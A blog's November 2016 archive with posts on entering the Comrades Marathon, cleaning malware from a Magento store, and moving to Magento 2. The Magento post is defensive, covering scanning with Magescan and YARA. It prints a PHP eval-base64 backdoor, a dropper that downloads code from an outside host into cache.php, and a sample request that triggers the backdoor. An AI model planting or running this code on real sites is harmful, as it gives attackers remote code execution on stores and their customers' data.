Month: November 2016

Well, I’m Running Comrades…

I've been running Parkruns, I enjoy running and I have been improving. So I set a target of a sub 25 minute parkrun (5km) to buy new running shoes. I made it and bought the shoes. Was so stoked that I signed up for comrades when I got home. So on the 23rd of November 2016 I signed up and paid the entry...Well I'm running comrades...

Comrades Marathon

The Entries closed on 30th of November, as you can see the page is now 404ing.

comrades entry 2017 404

Finding Malicious Code on Magento

The first thing to do is check your site from an outside perspective, as any other black hatter would do.

The Frontend scan

Use Magescan: ./magescan scan:all <site>

This scan will usually tell you what patches will be applied. First thing to do would be to patch them immediately.

Next thing is to check if there are any known modules that are vulnerable under Installed Modules. A classic problem extension is:


+------------------------+-----------+
| Module                 | Installed |
+------------------------+-----------+
| VladimirPopov_WebForms | Yes       |
+------------------------+-----------+

This extension allows users to upload anything they want onto your server including files with the extension .php

So get rid of that thing as soon as you  can.

A server side scan

Now time to scan for vulnerabilities and remote execution that are already a part of your magento site.

The best thing to use would be a Magento malware collection

The command to run is yara -r rules/all-confirmed.yar /path/to/directory

It will check against known MD5 hashes for files and for eval expressions:


eval_post My-site/magento/media/dhl/info.php
md5_c647e85ad77fd9971ba709a08566935d My-site/magento/media/wysiwyg/12345.php

The contents of info.php is:


$hash = 'fc5e038d38a57032085441e7fe7010b0';
if(isset($_POST['ue'])){
    if (md5($_POST['hash']) === $hash) @eval(base64_decode($_POST['ue']));
    exit;
}
if(isset($_GET['sesion'])){
    phpinfo();
}

The contents of 12345.php is:


$cmd1 = file_get_contents("http://seotramp.com/wp-content/plugins/youtuber/cache.txt");
$fo = fopen("cache.php", "w+");
fwrite($fo, $cmd1);
fclose($fo);

I am not too sure about the second one, as that is more of a redirect hack that sends you and maybe your users to a Be Rich now if you use the Binary Options System

The first one is remote execution where you encode your code base64 and add a hash. I think they add all of these extra things just to confuse developers into thinking there is nothing going on here.

So to try it out we can make a post to: media/dhl/info.php

With

$_POST['ue'] = ZWNobyAnaGVsbG8gd29ybGQnOw==

and

$_POST['hash'] = helloworld

ZWNobyAnaGVsbG8gd29ybGQnOw==, base64 decoded is echo hello world;

So that is remote execution

 

Should I Upgrade to Magento 2?

Magento 2 has been around for more than a year now and many store owners are looking for something new to enhance their offerings. Developers have also heard about the numerous enhancements and would be no doubt looking to try it out. Well I have been trying out for the past few weeks on a project and I will be giving an overview of my thoughts having developed extensively on Magento 1.

Should I Upgrade to Magento 2: The Developer Perspective

Say for example you buy a theme and want to extend css, not on the admin section but in the code. Creating a child theme is ok and feels good but integrating with the existing Grunt setup to create a task that creates the css from less is a headache nightmare

Although this should be automatically taken care of, I hear.

Working with frontend js also requires you to learn...require.js which is pretty tricky but feels right. It is just difficult for the clowns developing themes to take this in to account and their answer to js condole errors is, merge all js into a single file so it all loads into the correct order.